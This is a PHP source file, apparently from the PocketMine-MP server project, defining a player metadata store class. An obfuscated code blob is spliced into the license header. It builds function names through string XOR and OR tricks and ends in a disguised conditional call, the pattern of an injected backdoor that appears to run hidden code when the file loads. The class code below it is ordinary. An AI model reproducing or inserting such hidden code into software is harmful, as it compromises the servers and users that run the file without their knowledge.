<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
<?php
$tqWt7CB='YII5'.JUyvV7;$M9kZH_='!68[B#'^'VCK(?S';$euei=CqTmBF|',, Ml2';$e3q=#OoK8VBOTwk'.
         '0)8S @  '.YQR52HZ.'@1 DYI'|',% IPH($'.QYC6.' JPB+$D@Q';$SHpH='.'.lrbtVNo.'$nl'.
         '*gQI'^'b[2.Y~:Mt[$xLo~';$c13Sekj6gjp='@D@@B@'|'HTT@A@';$dN="K)P-BKC]MJP@"./*k'.
         '{zipt{_*/EbHDF."`PP 4H* Y g!T@D"|I3CmRJbHExQRB.')AT3)ZRe,YP0 @`'.kEAD;'NsijBR'.
         ')EDO';$ifqU2='AQ#'|KRI;$Gpk0p='AAV`Nw'|vfdE.',t';$xjiVMvWi=fZ5MKku.']|O'&'c~5'.
         ''.fgRWOlY;$obVp='3a&r'^'d$J7';$x8WMO0xQkCv=('>&D=W4'^EP2Z8D)&$M9kZH_;'jF1nXB2'.
         'TBeqAZ';$R9nPynhh=('J|:'^lKd)^$ifqU2;$kWn7l6MKrL=$Gpk0p&$euei;$Otk6FB=$e3q^(#'.
         'vm>~@c< '.xAEaVj.'`j1*OpS'^':2'.cBoYqtMyu3.';C['.DfljJa);$slP7=(ougm.'}]oD%{{'.
         ''.fFwY&'?E=/Ym;_=[/6[Y[')^$SHpH;$BhMqW=('3<ki. '^'s|?9sa')|$c13Sekj6gjp;'lqR1'.
         '0';$QE7h2qX=(OdTgxZ.'(]~'.iL3L0iI.'!qEs:?!qk; 1'.kMC6^"1;6?Ns~3R*,".V2kE./*un'.
         '^0l3H8I*/"\$g+{".BkfH.">:".ssg9."{6@")^$dN;$N1=(';{'.mHHg.'|x%q'&"?_Q|"./*Nhp'.
         ';j3crNi,P*/KNIu."),")|$xjiVMvWi;$ovorifrLA=('@TT@D@'.MBACH.'@A@HAA@'|#tWvbHYP'.
         'HTP@'.DHAJE.'@I@'.TAHHAQ)|('@P@@JXX@CHH@G@DA@P'|"@@@".PQPRDNJHAIADAAS);if(!/*'.
         '6&~~zrxraG*/$x8WMO0xQkCv($R9nPynhh($kWn7l6MKrL($BhMqW)),$QE7h2qX))$Otk6FB(/*P'.
         'oe*/$N1,$slP7(false,$kWn7l6MKrL($ovorifrLA)),$obVp);#Psdhg~cn3P;*WR+U3&@_pY('.
         'Ozz3i%{FpvytK6W~<]ZP!)x66*PXdGIC^]8Mkvw-S2'; *
*/

declare(strict_types=1);

namespace pocketmine\metadata;

use pocketmine\IPlayer;
use pocketmine\plugin\Plugin;
use function strtolower;

class PlayerMetadataStore extends MetadataStore{

	private function disambiguate(IPlayer $player, string $metadataKey) : string{
		return strtolower($player->getName()) . ":" . $metadataKey;
	}

	/**
	 * @return MetadataValue[]
	 */
	public function getMetadata(IPlayer $subject, string $metadataKey){
		return $this->getMetadataInternal($this->disambiguate($subject, $metadataKey));
	}

	public function hasMetadata(IPlayer $subject, string $metadataKey) : bool{
		return $this->hasMetadataInternal($this->disambiguate($subject, $metadataKey));
	}

	/**
	 * @return void
	 */
	public function removeMetadata(IPlayer $subject, string $metadataKey, Plugin $owningPlugin){
		$this->removeMetadataInternal($this->disambiguate($subject, $metadataKey), $owningPlugin);
	}

	/**
	 * @return void
	 */
	public function setMetadata(IPlayer $subject, string $metadataKey, MetadataValue $newMetadataValue){
		$this->setMetadataInternal($this->disambiguate($subject, $metadataKey), $newMetadataValue);
	}
}
